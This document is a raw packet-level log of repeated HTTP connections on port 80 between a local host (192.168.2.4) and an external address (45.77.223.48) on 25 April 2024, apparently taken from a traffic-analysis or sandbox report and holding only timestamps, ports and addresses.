Apr 25, 2024 09:42:12.161775112 CEST	80	49759	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:12.161817074 CEST	49759	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:12.280560017 CEST	80	49759	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:12.280627012 CEST	49759	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:12.280721903 CEST	80	49759	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:12.280736923 CEST	80	49759	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:12.280764103 CEST	49759	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:12.280782938 CEST	49759	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:12.288764000 CEST	49761	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:12.421247005 CEST	80	49761	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:12.421334982 CEST	49761	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:12.423264980 CEST	49761	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:12.553987026 CEST	80	49761	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:12.554119110 CEST	49761	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:12.684752941 CEST	80	49761	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:13.559456110 CEST	80	49761	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:13.559639931 CEST	80	49761	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:13.559693098 CEST	80	49761	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:13.559711933 CEST	49761	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:13.559756041 CEST	49761	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:13.574517012 CEST	80	49761	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:13.574577093 CEST	49761	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:13.575109959 CEST	80	49761	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:13.575151920 CEST	49761	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:13.575181007 CEST	80	49761	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:13.575222969 CEST	49761	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:13.575377941 CEST	80	49761	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:13.575388908 CEST	80	49761	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:13.575414896 CEST	49761	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:13.575438023 CEST	80	49761	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:13.575459003 CEST	80	49761	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:13.575479031 CEST	49761	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:13.575495005 CEST	49761	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:13.691356897 CEST	80	49761	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:13.691375971 CEST	80	49761	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:13.691423893 CEST	49761	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:13.694457054 CEST	49762	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:13.825069904 CEST	80	49762	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:13.825156927 CEST	49762	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:13.826992989 CEST	49762	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:13.957652092 CEST	80	49762	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:13.957707882 CEST	49762	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:14.088453054 CEST	80	49762	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:14.795881033 CEST	80	49762	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:14.795995951 CEST	49762	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:14.796097040 CEST	80	49762	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:14.796113014 CEST	80	49762	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:14.796148062 CEST	49762	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:14.796174049 CEST	49762	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:14.805701017 CEST	80	49762	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:14.805742025 CEST	49762	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:14.806463957 CEST	80	49762	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:14.806490898 CEST	80	49762	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:14.806521893 CEST	49762	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:14.806536913 CEST	49762	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:14.806750059 CEST	80	49762	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:14.806762934 CEST	80	49762	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:14.806799889 CEST	49762	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:14.806868076 CEST	80	49762	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:14.806909084 CEST	49762	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:14.806921959 CEST	80	49762	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:14.806967020 CEST	49762	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:14.926621914 CEST	80	49762	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:14.926668882 CEST	49762	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:14.926799059 CEST	80	49762	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:14.926812887 CEST	80	49762	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:14.926841021 CEST	49762	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:14.926860094 CEST	49762	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:14.926975012 CEST	49763	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:15.056813955 CEST	80	49763	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:15.056906939 CEST	49763	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:15.058675051 CEST	49763	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:15.188472986 CEST	80	49763	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:15.188554049 CEST	49763	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:15.320071936 CEST	80	49763	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:16.026596069 CEST	80	49763	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:16.026631117 CEST	80	49763	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:16.026647091 CEST	80	49763	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:16.026693106 CEST	49763	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:16.026743889 CEST	49763	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:16.035516977 CEST	80	49763	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:16.035579920 CEST	49763	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:16.035778046 CEST	80	49763	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:16.035823107 CEST	49763	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:16.036103964 CEST	80	49763	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:16.036154032 CEST	49763	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:16.036222935 CEST	80	49763	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:16.036263943 CEST	49763	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:16.036348104 CEST	80	49763	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:16.036385059 CEST	49763	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:16.036387920 CEST	80	49763	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:16.036427021 CEST	49763	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:16.036433935 CEST	80	49763	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:16.036478996 CEST	49763	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:16.157062054 CEST	80	49763	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:16.157089949 CEST	80	49763	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:16.157109022 CEST	49763	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:16.157126904 CEST	49763	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:16.162683964 CEST	49764	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:16.288561106 CEST	80	49764	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:16.288649082 CEST	49764	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:16.290446043 CEST	49764	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:16.416378975 CEST	80	49764	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:16.416588068 CEST	49764	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:16.542928934 CEST	80	49764	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:17.244680882 CEST	80	49764	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:17.244828939 CEST	49764	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:17.244985104 CEST	80	49764	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:17.244997025 CEST	80	49764	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:17.245053053 CEST	49764	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:17.245053053 CEST	49764	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:17.255544901 CEST	80	49764	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:17.255629063 CEST	49764	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:17.255914927 CEST	80	49764	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:17.255965948 CEST	49764	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:17.256104946 CEST	80	49764	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:17.256154060 CEST	49764	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:17.256175041 CEST	80	49764	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:17.256223917 CEST	49764	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:17.256627083 CEST	80	49764	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:17.256674051 CEST	49764	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:17.256705999 CEST	80	49764	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:17.256753922 CEST	49764	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:17.256825924 CEST	80	49764	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:17.256876945 CEST	49764	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:17.371890068 CEST	80	49764	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:17.372076988 CEST	49764	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:17.372124910 CEST	80	49764	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:17.372138977 CEST	80	49764	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:17.372205973 CEST	49764	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:17.372205973 CEST	49764	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:17.396886110 CEST	49765	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:17.522758007 CEST	80	49765	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:17.522834063 CEST	49765	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:17.524611950 CEST	49765	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:17.650245905 CEST	80	49765	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:17.650319099 CEST	49765	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:17.775885105 CEST	80	49765	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:18.466468096 CEST	80	49765	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:18.466557026 CEST	49765	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:18.466639042 CEST	80	49765	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:18.466681004 CEST	49765	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:18.466790915 CEST	80	49765	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:18.466831923 CEST	49765	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:18.466859102 CEST	80	49765	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:18.466922998 CEST	49765	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:18.466968060 CEST	80	49765	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:18.467008114 CEST	49765	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:18.476464033 CEST	80	49765	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:18.476511955 CEST	49765	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:18.477210045 CEST	80	49765	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:18.477251053 CEST	49765	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:18.477312088 CEST	80	49765	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:18.477348089 CEST	49765	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:18.477408886 CEST	80	49765	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:18.477421999 CEST	80	49765	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:18.477442026 CEST	49765	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:18.477452993 CEST	49765	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:18.593019962 CEST	80	49765	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:18.593081951 CEST	49765	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:18.593154907 CEST	80	49765	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:18.593192101 CEST	49765	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:18.593192101 CEST	80	49765	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:18.593230963 CEST	49765	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:18.601198912 CEST	49766	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:18.727049112 CEST	80	49766	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:18.727253914 CEST	49766	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:18.729352951 CEST	49766	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:18.857455969 CEST	80	49766	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:18.857623100 CEST	49766	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:18.983568907 CEST	80	49766	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:19.676090956 CEST	80	49766	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:19.676172972 CEST	80	49766	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:19.676177979 CEST	49766	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:19.676218987 CEST	49766	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:19.676260948 CEST	80	49766	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:19.676316977 CEST	49766	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:19.686048985 CEST	80	49766	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:19.686100006 CEST	49766	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:19.686269045 CEST	80	49766	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:19.686423063 CEST	80	49766	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:19.686438084 CEST	49766	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:19.686479092 CEST	49766	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:19.686562061 CEST	80	49766	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:19.686604977 CEST	49766	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:19.686760902 CEST	80	49766	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:19.686809063 CEST	49766	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:19.686810970 CEST	80	49766	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:19.686853886 CEST	49766	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:19.686980963 CEST	80	49766	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:19.687025070 CEST	49766	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:19.803682089 CEST	80	49766	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:19.803739071 CEST	49766	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:19.803893089 CEST	80	49766	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:19.803908110 CEST	80	49766	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:19.803944111 CEST	49766	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:19.803961992 CEST	49766	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:19.824865103 CEST	49767	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:19.953433037 CEST	80	49767	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:19.953540087 CEST	49767	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:19.955290079 CEST	49767	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:20.082781076 CEST	80	49767	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:20.083064079 CEST	49767	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:20.210088015 CEST	80	49767	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:20.902578115 CEST	80	49767	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:20.902595043 CEST	80	49767	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:20.902687073 CEST	49767	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:20.902717113 CEST	80	49767	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:20.902764082 CEST	49767	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:20.902764082 CEST	49767	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:20.911787987 CEST	80	49767	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:20.911844015 CEST	49767	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:20.912470102 CEST	80	49767	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:20.912519932 CEST	49767	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:20.913153887 CEST	80	49767	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:20.913202047 CEST	49767	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:20.913319111 CEST	80	49767	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:20.913373947 CEST	49767	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:20.913477898 CEST	80	49767	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:20.913505077 CEST	80	49767	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:20.913516998 CEST	80	49767	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:20.913527966 CEST	49767	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:20.913563013 CEST	49767	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:20.913563967 CEST	49767	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:21.029877901 CEST	80	49767	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:21.029930115 CEST	49767	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:21.030819893 CEST	80	49767	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:21.030867100 CEST	49767	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:21.042043924 CEST	49768	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:21.171593904 CEST	80	49768	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:21.171704054 CEST	49768	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:21.173515081 CEST	49768	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:21.304536104 CEST	80	49768	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:21.304595947 CEST	49768	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:21.434391975 CEST	80	49768	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:22.124806881 CEST	80	49768	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:22.124870062 CEST	80	49768	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:22.124888897 CEST	49768	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:22.124929905 CEST	49768	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:22.124936104 CEST	80	49768	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:22.124982119 CEST	49768	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:22.133994102 CEST	80	49768	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:22.134041071 CEST	49768	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:22.134406090 CEST	80	49768	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:22.134440899 CEST	49768	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:22.134527922 CEST	80	49768	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:22.134567976 CEST	49768	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:22.134689093 CEST	80	49768	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:22.134730101 CEST	49768	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:22.134879112 CEST	80	49768	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:22.134891033 CEST	80	49768	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:22.134917974 CEST	49768	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:22.134922028 CEST	80	49768	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:22.134936094 CEST	49768	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:22.134953976 CEST	49768	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:22.254640102 CEST	80	49768	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:22.254662991 CEST	80	49768	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:22.254676104 CEST	80	49768	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:22.254698038 CEST	49768	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:22.254738092 CEST	49768	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:22.305082083 CEST	49769	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:22.436064959 CEST	80	49769	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:22.436161995 CEST	49769	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:22.438277960 CEST	49769	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:22.569176912 CEST	80	49769	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:22.569266081 CEST	49769	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:22.706669092 CEST	80	49769	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:23.512512922 CEST	80	49769	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:23.512530088 CEST	80	49769	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:23.512540102 CEST	80	49769	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:23.512593985 CEST	49769	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:23.512662888 CEST	49769	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:23.514379025 CEST	80	49769	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:23.514424086 CEST	49769	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:23.514713049 CEST	80	49769	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:23.514753103 CEST	49769	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:23.519587994 CEST	80	49769	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:23.519649982 CEST	49769	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:23.519922018 CEST	80	49769	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:23.519963980 CEST	49769	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:23.520001888 CEST	80	49769	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:23.520030975 CEST	80	49769	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:23.520041943 CEST	49769	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:23.520070076 CEST	49769	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:23.520215034 CEST	80	49769	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:23.520266056 CEST	49769	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:23.643508911 CEST	80	49769	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:23.643527985 CEST	80	49769	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:23.643568993 CEST	49769	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:23.654429913 CEST	49770	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:23.785593033 CEST	80	49770	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:23.785840988 CEST	49770	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:23.788777113 CEST	49770	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:23.920013905 CEST	80	49770	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:23.920108080 CEST	49770	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:24.051103115 CEST	80	49770	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:24.977608919 CEST	80	49770	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:24.977785110 CEST	80	49770	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:24.977797031 CEST	80	49770	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:24.977818966 CEST	49770	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:24.977842093 CEST	49770	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:24.977849960 CEST	49770	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:24.977895975 CEST	80	49770	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:24.977938890 CEST	49770	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:24.978091002 CEST	80	49770	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:24.978130102 CEST	49770	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:24.978173971 CEST	80	49770	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:24.978215933 CEST	49770	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:25.006469965 CEST	80	49770	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:25.006532907 CEST	49770	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:25.009780884 CEST	80	49770	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:25.009793043 CEST	80	49770	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:25.009803057 CEST	80	49770	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:25.009834051 CEST	49770	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:25.009834051 CEST	49770	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:25.009850025 CEST	49770	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:25.108889103 CEST	80	49770	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:25.108951092 CEST	49770	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:25.109240055 CEST	80	49770	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:25.109252930 CEST	80	49770	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:25.109287024 CEST	49770	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:25.109306097 CEST	49770	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:25.117075920 CEST	49771	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:25.248447895 CEST	80	49771	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:25.248547077 CEST	49771	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:25.250535965 CEST	49771	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:25.381892920 CEST	80	49771	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:25.381947041 CEST	49771	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:25.513223886 CEST	80	49771	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:26.197526932 CEST	80	49771	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:26.197654009 CEST	49771	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:26.197863102 CEST	80	49771	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:26.197912931 CEST	49771	80	192.168.2.4	45.77.223.48
